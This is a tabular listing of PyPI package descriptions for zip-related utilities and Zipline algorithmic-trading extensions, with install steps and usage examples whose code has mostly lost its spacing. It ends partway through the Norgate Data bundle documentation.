package
stringlengths
1
122
pacakge-description
stringlengths
0
1.3M
zipget
No description available on PyPI.
zipgun
UNKNOWN
ziphmm
This is a minimal reimplementation of zipHMM in python. Also contains cython and weave implementations of standard hidden markov models for comparison.Undocumented and no install procedure - check test.py for usageTo run:`bash make python test.py `
ziphyr
ZiphyrZiphyr is an on-the-fly zip archiving applied on a streamed file source, with optional on-the-fly encryption.FeaturesDisclaimer:the zip-native cryptography is unsecureStreamed file turned into a streamed zipCan be used password-less for a non-encrypted zip streamOr with a password to apply on-the-fly zipcrypto to the streamRetro-compatibility for py35 with writable ZipInfo portInstall$pipinstallziphyrUsagefromziphyrimportZiphyr# init the Ziphyr objectz=Ziphyr(b'infected')# z = Ziphyr() for crypto-less usage# prepare it for a specific file, from path or metadata directlyz.from_filepath(filepath)# consume the generator to get the encrypted ziped chunkforkinz.generator(source):passTest$python-munittest-vtests/*.pyContributingContributions are welcome and are always greatly appreciated. Every little bit helps and credit will always be given. You can contribute in many ways:reporting a bugsubmitting feedbackhelping fix bugsimplementing new featureswritting better documentationRemember that before submitting a pull request, you should if relevant include tests and update documentation.Credits and referenceszip-relatedPython 3 zipfilePKWARE's .ZIP File Format SpecificationUnderlying worksThe following works served as sources of inspiration or examples for implementation.devthat/zipencrypt(MIT license)Ivan Ergunov's zipfile_generator(MIT license)CookiecutterThis package was kickstarted withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.
zip-import
zip_import推荐(最新的版本)pipinstallhttps://github.com/cn-kali-team/zip_import/archive/master.zip内存加载Python模块importioimportsysimportzipfilefromzip_importimportZipPathFinderdef_get_zip(path,password=None):withopen(path,"rb")asf:zip_bytes=io.BytesIO(f.read())zip_instantiation=zipfile.ZipFile(zip_bytes)ifpasswordisnotNone:zip_instantiation.setpassword(pwd=bytes(str(password),'utf-8'))returnzip_instantiationsys.meta_path.append(ZipPathFinder(zip_path='zip://pocsuite3.zip',zip_ins=_get_zip(path='pocsuite3.zip',password="11")))importpocsuite3print(dir(pocsuite3))zip_path随意字符串,zip_ins是zipfile.ZipFile返回的实例化对象
zipimportx
This package aims to speed up imports from zipfiles for frozen python apps (and other scenarios where the zipfile is assumed not to change) by taking several shortcuts that aren’t available to the standard zipimport module.It exports a single useful name, “zipimporter”, which is a drop-in replacement for the standard zipimporter class. To replace the builtin zipimport mechanism with zipimportx, do the following:import zipimportx zipimportx.zipimporter.install()With no additional work you may already find a small speedup when importing from a zipfile. Since zipimportx assumes that the zipfile will not change or go missing, it does fewer stat() calls and integrity checks than the standard zipimport implementation.To further speed up the loading of a zipfile, you can pre-compute the zipimport “directory information” dictionary and store it in a separate index file. This will reduce the time spent parsing information out of the zipfile. Create an index file like this:from zipimportx import zipimporter zipimporter("mylib.zip").write_index()This will create the file “mylib.zip.idx” containing the pre-parsed zipfile directory information. Specifically, it will contain a marshalled dictionary object with the same structure as those in zipimport._zip_directory_cache.In my tests, use of these indexes speeds up the initial loading of a zipfile by about a factor of 3 on Linux, and a factor of 5 on Windows.To further speed up the loading of a collection of modules, you can “preload” the actual module data by including it directly in the index. This allows the data for several modules to be loaded in a single sequential read rather than requiring a separate read for each module. Preload module data like this:from zipimportx import zipimporter zipimporter("mylib.zip").write_index(preload=["mymod*","mypkg*"])Each entry in the “preload” list is a filename pattern. Files from the zipfile that match any of these patterns will be preloaded when the zipfile is first accessed for import. You may want to remove them from the actual zipfile in order to save space.Finally, it’s possible to convert a zipfile into inline python code and include that code directly in your frozen application. This can simulate the effect of having that zipfile on sys.path, while avoiding any fie IO during the import process. To get the necessary sourcecode, do the following:from zipimportx import zipimporter code = zipimporter("mylib.zip").get_inline_code()Finally, it’s worth re-iterating the big assumption made by this module: the zipfile must never change or go missing. If the data in the index does not reflect the actual contents of the zipfile, imports will break in unspecified and probably disasterous ways.Note also that this package uses nothing but builtin modules. To bootstrap zipfile imports for a frozen application, you can inline this module’s code directly into your application’s startup script. Simply do something like this in your build process:import zipimportx import inspect SCRIPT = ''' %s zipimporter.install() import myapp myapp.main() ''' % (inspect.getsource(zipimportx),) freeze_this_script_somehow(SCRIPT) zipimportx.zipimporter("path/to/frozen/library.zip").write_index()
zipind
zipindzipind - From a folder, make a splitted ZIP with INDependent partsFree software: MIT licenseDocumentation:https://zipind.readthedocs.io.FeaturesCompact folder to .zip or .rar, dividing it into independent parts, grouping your files in alphanumeric order.Preserve the ordering of folders and files.Preserve the internal structure of folders.If any file exceeds the defined maximum size, the specific file is splitted in dependent mode.Set the file types to be ignored in compression (config/ignore_extensions.txt)Verify that the file path length is less than the specified limit (default 250 characters).Sanitize the folder and file names characters to ensure compatibility with UTF-8 encoding, by auto-renaming.RequirementsTo compress to Zip format, It is necessary to have7Zipapp installed and added in system variablesTo compress to Rar format, It is necessary to haveWinrarapp installed and added in system variablesUsageLet’s zip a folder, with a maximum of 100MB per file, in zip mode and ignoring ‘ISO’ extension files.Through python script importationimportzipindpath_folder=r'c://my_project'zipind.run(path_folder,mode='zip',mb_perfile=100,mode='zip',ignore_extensions=['iso'])Through terminal in chatbot-like style$ zipindZipind will start by responding:Zipind - From a folder, make a splitted ZIP with INDependent parts >> github.com/apenasrr/zipind << Paste the folder path to be compressed:Now paste the folder path to be compressed:Paste the folder path to be compressed: c://my_projectAnswer the questions to customize the parameters and your project will be processed.CLI ModeSoon…We recommendmises.org- Educate yourself about economic and political freedomlbry.tv- Store files and videos on blockchain ensuring free speechA Cypherpunk’s Manifesto- How encryption is essential to Free Speech and PrivacyCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.HistoryTired of dealing with dependent-mode slicing folders and not finding applications to be able to slice folders in independent pieces, the 2020 tyrannical lock-down time was used to create the first version of this tool.0.1.0 (2020-04)Birth of the first beta version1.1.0 (2022-09-04)First release on PyPI.
zipint
Efficient compression and decompression of unsigned integer arrays using binary representation.pip install zipintEfficientcompressionanddecompressionofunsignedintegerarraysusingbinaryrepresentation.Thismoduleprovidesfunctionsforcompressinganddecompressingintegerarraysefficientlyusingbinaryrepresentation.Itisdesignedtoworkwith2Dnumpyarraysandsupportscompressionanddecompressionofunsignedintegersinawaythatminimizesstoragespace.Usage:fromzipintimportzipint,unzipintimportnumpyasnpimportpandasaspddf=pd.DataFrame(np.random.randint(2,1000,(5,5)))print(df.to_string())f1=zipint(df)print(f'{f1=}')f2=unzipint(f1)print(f'{f2=}')df2=pd.DataFrame(f2)print(df2.to_string())# 0 1 2 3 4# 0 393 489 469 4 777# 1 436 322 491 753 143# 2 257 275 920 303 176# 3 654 981 337 395 211# 4 444 337 972 251 749# f1=array([432633621254921, 479733330199695, 282870732340400, 720134299069651,# 488546033200877], dtype=uint64)# f2=array([[393, 489, 469, 4, 777],# [436, 322, 491, 753, 143],# [257, 275, 920, 303, 176],# [654, 981, 337, 395, 211],# [444, 337, 972, 251, 749]], dtype=uint64)# 0 1 2 3 4# 0 393 489 469 4 777# 1 436 322 491 753 143# 2 257 275 920 303 176# 3 654 981 337 395 211# 4 444 337 972 251 749Note:Themoduleusesbinaryrepresentationtoefficientlystoreandretrieveunsignedintegervalues.Thecompresseddataisstoredasuint64foroptimization.Ifoverflowoccursduringconversion,thedataisstoredasanobjecttypearray.
zipit
zipitVery thin wrapper around zipapp that let's you package a python module and dependencies.ExampleWe'll use our demo "app" to showcase zipit.First, let's take a look at what our app contains:$ cd demo $ ls app __main__.py requirements.txtOur "app" contains two files:__main__.py: This is the entrypoint to our app.requirements.txt: This is a classic requirements file as consumed by pip.Getting things set upFirst we need to install the dependencies for our app. zipit doesn't much care how dependencies are installed. We just need to keep track of where they're installed.Let's use pip:mkdir deps $ python3 -m pip install -r app/requirements.txt --target depszipitOnce the dependencies are installed, we can let zipit do it's work:cd .. $ python3 -m zipit demo/app -d demo/depsThis will produce.pyzfile runable with python.$ python3 app.pyz Hello, World!
zipjson
zipjson - a simple tool to create and read compressed JSON filesInstallationpipinstallgit+https://github.com/vguzov/zipjson.gitUsage:The following code creates a .zip archive withdata.jsonfile inside it, containing the serialized data, then reads itimportzipjsonany_jsonable_data={"something":42}file_object=open("test.json.zip","wb")# Mind the additional 'b' flagzipjson.dump(any_jsonable_data,file_object)loaded_data=zipjson.load(open("test.json.zip","rb"))print(loaded_data)# {'something': 42}In-memory methodsdumpsandloadsare supported as well
zipkin
python-zipkinis an api for recording and sending messages toZipkin. Why use it? From thehttp://twitter.github.io/zipkin/:“Collecting traces helps developers gain deeper knowledge about how certain requests perform in a distributed system. Let’s say we’re having problems with user requests timing out. We can look up traced requests that timed out and display it in the web UI. We’ll be able to quickly find the service responsible for adding the unexpected response time. If the service has been annotated adequately we can also find out where in that service the issue is happening.”Supported versionsPython:2.6,2.7(the current Python Thrift release doesn’t support Python 3)Recording annotationspython-zipkincreates a single span per served requests. It automatically adds a number of annotations (see below). You can also add your own annotations from anywhere in your code:fromzipkin.apiimportapiaszipkin_apizipkin_api.record_event('MySQL: "SELECT * FROM auth_users"',duration=15000)# Note duration is in microseconds, as defined by Zipkinzipkin_api.record_key_value('Cache misses',15)# You can use string, int, long and bool valuesHackingSeeCONTRIBUTING.mdfor guidelines.You can start hacking onpython-zipkinwith:gitclonehttps://github.com/prezi/python-zipkin.gitcdpython-zipkingitremoterenameoriginupstreamvirtualenvvirtualenv.virtualenv/bin/activatepythonsetup.pytest
zipkin-agent
dapr-trace-sdkdapr trace sdk. 目前支持daprClient、flask、requests,其他插件待开发
zipkin_query
Failed to fetch description. HTTP Status Code: 404
ziplib
No description available on PyPI.
zipline
Zipline is a Pythonic algorithmic trading library. It is an event-driven system for backtesting. Zipline is currently used in production as the backtesting and live-trading engine poweringQuantopian– a free, community-centered, hosted platform for building and executing trading strategies. Quantopian also offers afully managed service for professionalsthat includes Zipline, Alphalens, Pyfolio, FactSet data, and more.Join our Community!DocumentationWant to Contribute? See ourDevelopment GuidelinesFeaturesEase of Use:Zipline tries to get out of your way so that you can focus on algorithm development. See below for a code example.“Batteries Included”:many common statistics like moving average and linear regression can be readily accessed from within a user-written algorithm.PyData Integration:Input of historical data and output of performance statistics are based on Pandas DataFrames to integrate nicely into the existing PyData ecosystem.Statistics and Machine Learning Libraries:You can use libraries like matplotlib, scipy, statsmodels, and sklearn to support development, analysis, and visualization of state-of-the-art trading systems.InstallationZipline currently supports Python 2.7, 3.5, and 3.6, and may be installed via either pip or conda.Note:Installing Zipline is slightly more involved than the average Python package. See the fullZipline Install Documentationfor detailed instructions.For a development installation (used to develop Zipline itself), create and activate a virtualenv, then run theetc/dev-installscript.QuickstartSee ourgetting started tutorial.The following code implements a simple dual moving average algorithm.fromzipline.apiimportorder_target,record,symboldefinitialize(context):context.i=0context.asset=symbol('AAPL')defhandle_data(context,data):# Skip first 300 days to get full windowscontext.i+=1ifcontext.i<300:return# Compute averages# data.history() has to be called with the same params# from above and returns a pandas dataframe.short_mavg=data.history(context.asset,'price',bar_count=100,frequency="1d").mean()long_mavg=data.history(context.asset,'price',bar_count=300,frequency="1d").mean()# Trading logicifshort_mavg>long_mavg:# order_target orders as many shares as needed to# achieve the desired number of shares.order_target(context.asset,100)elifshort_mavg<long_mavg:order_target(context.asset,0)# Save values for later inspectionrecord(AAPL=data.current(context.asset,'price'),short_mavg=short_mavg,long_mavg=long_mavg)You can then run this algorithm using the Zipline CLI. First, you must download some sample pricing and asset data:$ziplineingest$ziplinerun-fdual_moving_average.py--start2014-1-1--end2018-1-1-odma.pickle--no-benchmarkThis will download asset pricing data data sourced from Quandl, and stream it through the algorithm over the specified time range. Then, the resulting performance DataFrame is saved indma.pickle, which you can load and analyze from within Python.You can find other examples in thezipline/examplesdirectory.Questions?If you find a bug, feel free toopen an issueand fill out the issue template.ContributingAll contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome. Details on how to set up a development environment can be found in ourdevelopment guidelines.If you are looking to start working with the Zipline codebase, navigate to the GitHubissuestab and start looking through interesting issues. Sometimes there are issues labeled asBeginner FriendlyorHelp Wanted.Feel free to ask questions on themailing listor onGitter.NotePlease note that Zipline is not a community-led project. Zipline is maintained by the Quantopian engineering team, and we are quite small and often busy.Because of this, we want to warn you that we may not attend to your pull request, issue, or direct mention in months, or even years. We hope you understand, and we hope that this note might help reduce any frustration or wasted time.
zipline-ai
zipline-aiPackage for Zipline's Python API.
zipline-ai-dev
Zipline Python APIOverviewZipline Python API for materializing configs to be run by the Zipline Engine.Set up for publishing.Create your~/.pypircfile with your credentials for pypi repository.[distutils] index-servers = pypi pypitest local [pypi] username: nalgeon # replace with your PyPI username [pypitest] repository: https://test.pypi.org/legacy/ username: nalgeon # replace with your TestPyPI username [local] repository: <local artifactory repository>Generate the required thrift modules, update the version and run the respective command to publish to the desired repository:python setup.py sdist upload -r { pypi | pypitest | local }
zipline-bitmex
BitMEX bundle forZipline[WARNING]There is a bug in this repo. It can ingest the data from the BitMEX API to the Zipline folder, but somehow I can’t run an algorithm upon it. Any PRs or advice would be appreciated!UsageInstall this package with pip:pip install zipline-bitmex. You may want to run this command with--userparameter.Register this package to Zipline by writing following content to$HOME/.zipline/extension.py:fromzipline.data.bundlesimportregisterfromzipline_bitmeximportbitmex_bundleimportpandasaspdstart=pd.Timestamp('2019-01-01',tz='utc')end=pd.Timestamp('2019-01-07',tz='utc')register('bitmex',bitmex_bundle(['XBTUSD']),calendar_name='bitmex',start_session=start,end_session=end,minutes_per_day=24*60,)Ingest the data bundle with:zipline ingest -b bitmex
zipline-cli
Zipline CLIPython 3 CLI Uploader for Zipline. Zipline CLI is currently functional andUnder Active Development.Please open aFeature Requestfor new features and submit anIssuefor any bugs you find.Zipline Docs:https://zipline.diced.tech/Table of ContentsQuick StartInstallCLI UsageEnvironment VariablesPython API ReferenceAdditional InformationQuick Startpython3-mpipinstallzipline-cli zipline--setupInstallFrom PyPi using pip:python3-mpipinstallzipline-cliFrom GitHub using pip:python3-mpipinstallgit+https://github.com/cssnr/zipline-cli.gitFrom Source using pip:gitclonehttps://github.com/cssnr/zipline-cli.git python3-mpipinstall-ezipline-cliFrom Source using setuptools:gitclonehttps://github.com/cssnr/zipline-cli.gitcdzipline-cli python3setup.pyinstallUninstallTo completely remove from any above install methods:python3-mpipuninstallzipline-cliCLI UsageSetup Zipline URL and Token:zipline--setupUpload a File:ziplinetest.txtUpload Multiple Files:ziplinefile1.txtfile2.txtCreate Text File from Inputcattest.txt|ziplineCreate Text File from Clipboardzipline# Paste or Type contents, followed by a newline, then Ctrl+D (Ctrl+Z on Windows)Environment VariablesEnvironment Variables are stored in the.ziplinefile in your home directory.Location:~/.ziplineor$HOME/.ziplineVariableDescriptionZIPLINE_URLURL to your Zipline InstanceZIPLINE_TOKENAuthorization Token from ZiplineZIPLINE_EMBEDSet this enable Embed on your uploadsZIPLINE_FORMATOutput Format after upload. Variables:{filename},{url}and{raw_url}ZIPLINE_EXPIRESee:https://zipline.diced.tech/docs/guides/upload-options#image-expirationSee.zipline.examplefor an example.ziplinefile.You may override them by exporting the variables in your current environment or using the corresponding command line arguments. See-hfor more info.Python API ReferenceInitialize the class with your Zipline URL. Everything else is a header passed as a kwarg. The API does not yet support environment variables.Zipline Token/Authorization is a header kwarg and can be passed as follows:fromziplineimportZiplinezipline=Zipline('ZIPLINE_URL',authorization='ZIPLINE_TOKEN')Upload a FilefromziplineimportZiplinezipline=Zipline('ZIPLINE_URL',authorization='ZIPLINE_TOKEN')withopen('text.txt')asf:url=zipline.send_file('test.txt',f)print(url)Additional InformationStill have questions, concerns, or comments?Feature RequestsHelpdesk Q&ADiscordZipline Guide: Hit That Fresh Nar Nar:youtube.com/watch?v=bJHYo2aGWgE
zipline-cn-databundle
No description available on PyPI.
zipline-cn-extension
No description available on PyPI.
zipline-crypto
Backtest your Trading StrategiesVersion InfoTestStatusCommunityZipline is a Pythonic event-driven system for backtesting, developed and used as the backtesting and live-trading engine bycrowd-sourced investment fund Quantopian. Since it closed late 2020, the domain that had hosted these docs expired. The library is used extensively in the bookMachine Larning for Algorithmic TradingbyStefan Jansenwho is trying to keep the library up to date and available to his readers and the wider Python algotrading community.Join our Community!DocumentationFeaturesEase of Use:Zipline tries to get out of your way so that you can focus on algorithm development. See below for a code example.Batteries Included:many common statistics like moving average and linear regression can be readily accessed from within a user-written algorithm.PyData Integration:Input of historical data and output of performance statistics are based on Pandas DataFrames to integrate nicely into the existing PyData ecosystem.Statistics and Machine Learning Libraries:You can use libraries like matplotlib, scipy, statsmodels, and scikit-klearn to support development, analysis, and visualization of state-of-the-art trading systems.InstallationZipline supports Python >= 3.9 and is compatible with current versions of the relevantNumFOCUSlibraries, includingpandasandscikit-learn.If your system meets the pre-requisites described in theinstallation instructions, you can install Zipline using pip by running:pipinstallzipline-cryptoSee theinstallationsection of the docs for more detailed instructions.QuickstartSee ourgetting started tutorial.The following code implements a simple dual moving average algorithm.fromzipline.apiimportorder_target,record,symboldefinitialize(context):context.i=0context.asset=symbol('AAPL')defhandle_data(context,data):# Skip first 300 days to get full windowscontext.i+=1ifcontext.i<300:return# Compute averages# data.history() has to be called with the same params# from above and returns a pandas dataframe.short_mavg=data.history(context.asset,'price',bar_count=100,frequency="1d").mean()long_mavg=data.history(context.asset,'price',bar_count=300,frequency="1d").mean()# Trading logicifshort_mavg>long_mavg:# order_target orders as many shares as needed to# achieve the desired number of shares.order_target(context.asset,100)elifshort_mavg<long_mavg:order_target(context.asset,0)# Save values for later inspectionrecord(AAPL=data.current(context.asset,'price'),short_mavg=short_mavg,long_mavg=long_mavg)You can then run this algorithm using the Zipline CLI. But first, you need to download some market data with historical prices and trading volumes:$ziplineingest-bquandl $ziplinerun-fdual_moving_average.py--start2014-1-1--end2018-1-1-odma.pickle--no-benchmarkThis will download asset pricing data sourced fromQuandl, and stream it through the algorithm over the specified time range. Then, the resulting performance DataFrame is saved asdma.pickle, which you can load and analyze from Python.You can find other examples in thezipline/examplesdirectory.Questions, suggestions, bugs?If you find a bug or have other questions about the library, feel free toopen an issueand fill out the template.
zipline-django-pyodbc-azure
zipline-django-pyodbc-azure.. image::http://img.shields.io/pypi/v/django-pyodbc-azure.svg?style=flat:target:https://pypi.python.org/pypi/django-pyodbc-azure.. image::http://img.shields.io/pypi/l/django-pyodbc-azure.svg?style=flat:target:http://opensource.org/licenses/BSD-3-Clausezipline-django-pyodbc-azureis a modern fork ofdjango-pyodbc-azure <https://github.com/michiya/django-pyodbc-azure>
zipline-live
No description available on PyPI.
zipline-live2
No description available on PyPI.
zipline-live2-vk
No description available on PyPI.
zipline-norgatedata
Integrates financial market data provided byNorgate DatawithZipline, a Pythonic algorithmic trading library for backtesting.Key features of this extensionSimple bundle creationSurvivorship bias-free bundlesIncorporates time series data such as historical index membership and dividend yield into Zipline's Pipeline mechanismNo modifications to the Zipline code base (except to fix problems with installation and obsolete calls that crash Zipline)Table of ContentsRequirementsHow to install Zipline using Anaconda/MinicondaHow to install Zipline Reloaded and PyFolio, and Zipline-NorgateDataUpgrades of Zipline-NorgateDataExchange Calendar Issues that require patchingPatch to allow backtesting before 20 years agoAdditional patch to allow backtesting before 1990Patch to allow calendars other than US calendars for backtestingPatches for Canadian equitiesBacktest AssumptionsBundle CreationBenchmark against a symbolPipelines - accessing timeseries dataWorked example backtesting S&P 500 Constituents back to 1990Worked example backtesting E-Mini S&P 500 futuresMetadataNorgate Data Futures Market Session symbolsZipline Limitations/QuirksTesting on Australian ASX dataTesting on Canadian TSX dataBooks/publications that use Zipline, adapted for Norgate Data useFAQsDuring a backtest I receive an error ValueError: 'Time Period' is not in list. How do I fix this?During a backtest, an error message is shown for index_constituent_timeseriesChange logInstalling older versionsSupportThanksRecent Version HistoryRequirementsZipline 2.4 and above (based upon theZipline Reloaded forkled by Stefan Jansen, which originates from the Quantopian-developed Zipline (which became become abandonware). We recommend the latest release of Zipline Reloaded (currently v3.0) and associated packages (such as exchange-calendars) - there are too many quirks and workarounds for issues with older versions of Zipline to continue to maintain backwards compatibility.Python 3.8+ (Python 3.10 recommended)Microsoft WindowsAn activeNorgate DatasubscriptionNorgate Data Updater software installed and runningWritable local user folder named .norgatedata (or defined in environment variable NORGATEDATA_ROOT) - defaults to C:\Users\Your username\.norgatedataPython packages: Pandas, Numpy, LogbookNote: The "Norgate Data Updater" application (NDU) is a Windows-only application. NDU must be running for this Python package to work.How to install Zipline using Anaconda/MinicondaMost people have problems installing Zipline because they attempt to install it into their base environment. The solution is simple: Create a separate virtual environment that only has the necessary Python pacakges you require. If you want to experiment then just create a new environment.Firstly, install either Anaconda (graphical environment) or Miniconda (cut-down command-line-based). These instructions relate to Windows only.How to install Zipline Reloaded and PyFolio, and Zipline-NorgateDataHere's how we installed it here at Norgate:Note: We use Mamba instead of conda for the majority of the install, as it seems to be much quicker in resolving everything (ie seconds instead of minutes) and parallelizing the downlodas/install.Install the latest 64 bitMiniCondaorAnaconda Distribution.If you have ANY other running instances of Anaconda prompt/jupyter etc.,ensure sure they are all shut down.Start an Anaconda (base) prompt, create an environment and install the appropriate versions of packages:conda create -y -n zip310 python=3.10 conda activate zip310 conda install -y -c conda-forge h5py zipline-reloaded pyfolio-reloaded conda install -y -c conda-forge jupyter logbook pip install norgatedata zipline-norgatedata if not exist %HOMEPATH%\.zipline mkdir %HOMEPATH%\.zipline if not exist %HOMEPATH%\.zipline\extension.py copy /b NUL %HOMEPATH%\.zipline\extension.pyNote: Mamba is used to install zipline-reloaded, because the Conda package manager becomes confused with so many dependencies required. Mamba is also about 10 times quicker than Conda.Upgrades of Zipline-NorgateDataTo receive upgrades/updatespipinstallzipline-norgatedata--upgradeExchange Calendar Issues that require patchingNorgate Data has developed the following patches. Please make sure you implement the ones applicable to you.Patch to allow backtesting before 20 years agoUnfortunately this is hardcoded into exchange_calendars for some reason. To extend backtesting beyond more than 20 years from today:Navigate to the exchange_calendars folder within site packages. This is typically located atC:\Users<your username>\miniconda3\envs\zip310\Lib\site-packages\exchange_calendarsEdit exchange_calendar.pyGo to line 58 and change:GLOBAL_DEFAULT_START = pd.Timestamp.now().floor("D") - pd.DateOffset(years=20)to the following:GLOBAL_DEFAULT_START = pd.Timestamp('1970-01-01')Additional patch to allow backtesting before 1990In addition to the "20 year" patch above if you want to do backtesting prior to 1990 you will need to patch Zipline to handle that too.Navigate to the zipline folder within site packages. This is typically located atC:\Users<your username>\miniconda3\envs\zip310\Lib\site-packages\ziplineNavigate to the subfolder utils.Edit calendar_utils.pyGo to line 31 and change:return ec_get_calendar(*args, side="right", start=pd.Timestamp("1990-01-01"))to the following:return ec_get_calendar(*args, side="right", start=pd.Timestamp("1970-01-01"))Patch to allow calendars other than US calendars for backtestingIf you see the message "AssertionError: All readers must share target trading_calendar." then you probably need this patch. Our testing shows that AU and CA stocks users need this.Navigate to the zipline folder within site packages. This is typically located atC:\Users<your username>\miniconda3\envs\zip310\Lib\site-packages\ziplineNavigate to the data subfolder and edit the file dispatch_bar_reader.pyLocate the code (around line 50)assert trading_calendar == r.trading_calendar, ( "All readers must share target trading_calendar. " "Reader={0} for type={1} uses calendar={2} which does not " "match the desired shared calendar={3} ".format( r, t, r.trading_calendar, trading_calendar ) )Change it to:assert isinstance(trading_calendar, type(r.trading_calendar)), ( "All readers must share target trading_calendar. " "Reader={0} for type={1} uses calendar={2} which does not " "match the desired shared calendar={3} ".format( r, t, r.trading_calendar, trading_calendar) )(For further details, seehttps://github.com/quantopian/zipline/issues/2684- this has been an issue for some time and the original solution doesn't address the issue since there are actually two instances of the calendar - one from run_algorithm and one from the register_bundle within extension.py)Patches for Canadian equitiesOf you are a Canadian Stocks user, you probably want to add this as a holiday:On 17 Dec 2008, TSX had a major outage and was halted not long after the open, and never reopened. In general, the financial industry has written off this day as a bust for the purposes of data analysis.The New Years observance shift to Monday only started in 2000.Navigate to the exchange_calendars folder within site packages. This is typically located atC:\Users<your username>\miniconda3\envs\zip310\Lib\site-packages\exchange_calendarsEdit exchange_calendar_xtse.py Add the following at line 95:# Significant failures where TSX was, for practical purposes, closed for the entire day TSXFailure20081217 = pd.Timestamp("2008-12-17")Edit exchange_calendar_xtse.py change the following at line 164:return list(chain(September11ClosingsCanada))to:return list(chain(September11ClosingsCanada),TSXFailure20081217,)Backtest AssumptionsStocks are automatically set an auto_close_date of the last quoted dateFutures are automatically set an auto_close_date to the earlier of following: 2 days prior to last trading date (for cash settled futures, and physically delivered futures that only allow delivery after the last trading date), or 2 trading days prior to first notice date for futures that have a first notice date prior to the last trading date.Bundle CreationNavigate to your Zipline local settings folder. This is typically located atc:\users\\.ziplineAdd the following lines at the top of your Zipline local settings file - i.e. extension.py (:Note: This isNOTthe extension.py file inside the Anaconda3\envs\\lib\site-packages\ziplinefromnorgatedataimportStockPriceAdjustmentTypefromzipline_norgatedataimport(register_norgatedata_equities_bundle,register_norgatedata_futures_bundle)Then create as many bundles definitions as you desire. These bundles will use either a given symbol list, one or more watchlists from your Norgate Data Watchlist Library and (for futures markets) all contracts belonging to a given set offutures market session symbols.Here are some examples with varying parameters. You should adapt these to your requirements.register_norgatedata_equities_bundle has the following default parameters: stock_price_adjustment_setting = StockPriceAdjustmentType.TOTALRETURN, end_session = 'now', calendar_name = 'NYSE', excluded_symbol_list = None,register_norgatedata_futures_bundle has the following default parameters: end_session = 'now', calendar_name = 'us_futures', excluded_symbol_list = None,# EQUITIES BUNDLES# Single stock bundle - AAPL from 1990 though 2018register_norgatedata_equities_bundle(bundlename='norgatedata-aapl',symbol_list=['AAPL','$SPXTR',],start_session='1990-01-01',end_session='2020-12-01')# FANG stocks (Facebook, Amazon, Netflix, Google) - 2012-05-18 until now# (is now really MANG !)register_norgatedata_equities_bundle(bundlename='norgatedata-fang',symbol_list=['META','AMZN','NFLX','GOOGL','$SPXTR',],start_session='2012-05-18',# This is that FB (now META) first traded)# A small set of selected ETFsregister_norgatedata_equities_bundle(bundlename='norgatedata-selected-etfs',symbol_list=['SPY','GLD','USO','$SPXTR',],start_session='2006-04-10',# This is the USO first trading date)# S&P 500 Bundle for backtesting including all current & past constituents back to 1990# and the S&P 500 Total Return index (useful for benchmarking and/or index trend filtering)# (around 1800 securities)register_norgatedata_equities_bundle(bundlename='norgatedata-sp500',symbol_list=['$SPXTR'],watchlists=['S&P 500 Current & Past'],start_session='1970-01-01',)# Russell 3000 bundle containing all ccurrent & past constituents back to 1990# and the Russell 3000 Total Return Index (useful for benchmarking and/or index trend filtering)# (about 11000 securities)register_norgatedata_equities_bundle(bundlename='norgatedata-russell3000',watchlists=['Russell 3000 Current & Past'],symbol_list=['$RUATR'],start_session='1990-01-01',)# And now a watchlist excluding a given list of symbolsregister_norgatedata_equities_bundle(bundlename='norgatedata-russell3000-exfroth',watchlists=['Russell 3000 Current & Past'],symbol_list=['$RUATR'],start_session='1990-01-01',excluded_symbol_list=['TSLA','AMZN','META','NFLX','GOOGL',])# FUTURES BUNDLES# Example bundle for all of the individual contracts from three futures markets:# E-mini S&P 500, E-mini Nasdaq 100, E-mini Russell 2000,# with $SPXTR added for benchmark referenceregister_norgatedata_futures_bundle(bundlename='norgatedata-selected-index-futures',session_symbols=['ES','NQ','RTY'],symbol_list=['$SPXTR'],start_session='2000-01-01',)For more bundle examples, scroll down to "Books/publications that use Zipline, adapted for Norgate Data use" below and download the Trading Evolved examples.To ingest a bundle:ziplineingest-b<bundlename>Benchmark against a symbolTo benchmark against an index, you should use add set_benchmark within the intialize function.definitialize(context):set_benchmark(symbol('$SPXTR'))# Note: $SPXTR must be included in the bundle# ...Pipelines - accessing timeseries dataTimeseries data has been exposed into Zipline's Pipeline interface. During a backtest, the Pipelines will be calculated against all securities in the bundle.The following Filter (i.e. boolean) pipelines are available:NorgateDataIndexConstituentNorgateDataMajorExchangeListedNorgateDataBlackCheckCompanyNorgateDataCapitalEventNorgateDataPaddingStatusThe following Factor (i.e. float) pipelines are available:NorgateDataUnadjustedCloseNorgateDataDividendYieldTo incorporate these into your trading model, you need to import the relevant packages/methods:fromzipline.pipelineimportPipelinefromzipline_norgatedata.pipelinesimport(NorgateDataIndexConstituent,NorgateDataDividendYield)fromzipline.apiimportorder_target_percent,set_benchmarkIt is recommended you put your pipeline construction in its own function:defmake_pipeline():indexconstituent=NorgateDataIndexConstituent('S&P 1500')divyield=NorgateDataDividendYield()returnPipeline(columns={'NorgateDataIndexConstituent':indexconstituent,'NorgateDividendYield':divyield},screen=indexconstituent)Incorporate this into your trading system by attaching it to your initialize method. Note, for better efficiency, use chunks=9999 or however many bars you are likely to need.This will save unnecessary access to the Norgate Data database.definitialize(context):set_benchmark(symbol('$SPXTR'))# Note: $SPXTR must be included in the bundleattach_pipeline(make_pipeline(),'norgatedata_pipeline',chunks=9999,eager=True)# ...Now you can access the contents of the pipeline in before_trading_start and/or handle_data by using Zipline's pipline_output method. You can exit positions not already in thedefbefore_trading_start(context,data):context.pipeline_data=pipeline_output('norgatedata_pipeline')# ... your code here ...# For example, you coulddefhandle_data(context,data):context.pipeline_data=pipeline_output('norgatedata_pipeline')current_constituents=context.pipeline_data.index# ... your code here ...# Exit positions not in the index todayforassetincontext.portfolio.positions:ifassetnotincurrent_constituents:order_target_percent(asset,0.0)# ... your code here ...Note: Access to historical index constituents requires a Norgate Data Stocks subscription at the Platinum or Diamond level.Worked example backtesting S&P 500 Constituents back to 1990This example comprises a backtest on the S&P 500, with a basic trend filter that is applied on the S&P 500 index ($SPX). The total return version of the index is also ingested ($SPXTR) for comparison purposes.Note: This requires a Norgate Data US Stocks subscription at the Platinum or Diamond level.Create a bundle definition in extensions.py as follows:fromzipline_norgatedataimportregister_norgatedata_equities_bundleregister_norgatedata_equities_bundle(bundlename='norgatedata-sp500-backtest',symbol_list=['$SPX','$SPXTR',],watchlists=['S&P 500 Current & Past',],start_session='1990-01-01',)Now, ingest that bundle into 